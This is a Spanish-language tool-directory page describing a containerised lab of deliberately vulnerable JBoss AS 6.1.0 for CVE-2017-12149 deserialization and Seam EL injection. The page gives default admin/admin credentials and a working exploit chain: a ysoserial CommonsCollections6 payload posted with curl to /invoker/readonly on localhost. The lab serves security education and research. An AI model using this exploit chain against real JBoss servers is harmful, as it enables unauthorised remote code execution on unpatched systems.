Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2017-12149-playground — Laboratorio de investigación con JBoss AS 6.1.0 en contenedor para demostrar vulnerabilidades de deserialización de Java (CVE-2017-12149) e inyección de EL en JBoss Seam, con pasos de verificación de exploits preconfigurados. | Kitploit
Herramientas/GitHubGitHub/galois17/cve-2017-12149-playground
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubgalois17/cve-2017-12149-playground

cve-2017-12149-playground

Laboratorio de investigación con JBoss AS 6.1.0 en contenedor para demostrar vulnerabilidades de deserialización de Java (CVE-2017-12149) e inyección de EL en JBoss Seam, con pasos de verificación de exploits preconfigurados.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
4hace 8 mesesAún no revisado

Muchas industrias críticas (banca, atención médica y manufactura) dependen de middleware heredado que fue construido para ejecutarse específicamente en JBoss 5 o 6. Debido a que estas aplicaciones suelen ser demasiado frágiles para migrar a versiones modernas de WildFly (el sucesor de JBoss), las organizaciones optan por "aislarlas" u ocultarlas detrás de VPNs en lugar de aplicar parches. Cuando esas defensas perimetrales fallan, la vulnerabilidad sigue ahí, activa y sin parchear.

Laboratorio de Investigación de Vulnerabilidades de JBoss AS 6.1.0

Este repositorio proporciona un entorno contenedorizado de JBoss Application Server 6.1.0 específicamente configurado para la investigación de seguridad y la verificación de vulnerabilidades. Está diseñado para demostrar fallos de deserialización de Java e inyección EL de JBoss Seam.


Inicio Rápido

1. Construir y Lanzar

Para asegurar que las credenciales y configuraciones personalizadas se apliquen correctamente, construya el contenedor desde cero:

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

2. Acceder al Entorno

Consola JBoss: http://localhost:8080/admin-console/

Usuario: admin

Contraseña: admin

Vulnerabilidades Verificadas

1. Deserialización de Java (CVE-2017-12149)

La ruta de explotación más fiable en este entorno es a través del HTTPServerILServlet ubicado en /invoker/readonly.

Pasos de verificación:

Genere un payload usando ysoserial para crear un archivo en /tmp:

root@kitploit:~
java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/pwned" > poc.ser

Envíe el payload binario mediante curl:

root@kitploit:~
curl -v -X POST --data-binary @poc.ser http://localhost:8080/invoker/readonly

Confirme que el exploit funcionó:

root@kitploit:~
docker exec -it jboss-custom-lab ls /tmp/pwned

Aviso de Seguridad Este entorno es intencionalmente vulnerable. Contiene software sin parchear y al final de su vida útil.

NO despliegue esto en un servidor expuesto públicamente.

NO utilice estas herramientas en sistemas en los que no tenga permiso explícito para realizar pruebas.

Desarrollado con fines educativos y de investigación en seguridad.

Dependencias: https://github.com/frohoff/ysoserial

Descargar herramienta